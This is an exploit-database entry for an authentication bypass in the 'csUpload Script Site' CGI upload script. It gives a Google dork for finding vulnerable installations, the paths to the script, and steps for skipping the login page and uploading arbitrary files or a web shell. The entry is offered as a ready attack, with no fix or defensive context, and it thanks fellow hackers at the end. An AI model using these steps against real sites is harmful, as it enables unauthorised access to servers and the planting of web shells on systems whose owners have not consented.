csUpload Script Site - Authentication Bypass Vulnerability

2014-04-09T00:00:00
ID 1337DAY-ID-22125
Type zdt
Reporter Satanic2000
Modified 2014-04-09T00:00:00

Description

Exploit for multiple platform in category web applications

                                        
                                            # Exploit Title: ["csUpload Script Site" Authentication Bypass]
# Google Dork: [CSUpload.cgi?command=]
# Date: 4/9/2014
# Exploit Author: Satanic2000
# Vendor Homepage: http://www.cgiscript.net
# Software Link: http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=12
# Version:
# Tested on: linux
# www.Site.com/[path]/CSUpload/CSUpload.cgi
# [path] : /cgi-script/     or /cgi-bin/ or None
 
# Example:
 
# 1-  http://localhost/cgi-bin/CSUpload//CSUpload.cgi?command=login
 
# 2- Bypass Authentication  http://localhost/cgi-bin/CSUpload/CSUpload.cgi
 
# 3- Select Database Select Databases And Upload (File,Or Shell)
 
# Special tnx S3Ri0uS . Pejvak . l3l4ck.$c0rpi0n And Other Friend

#  0day.today [2018-01-01]  #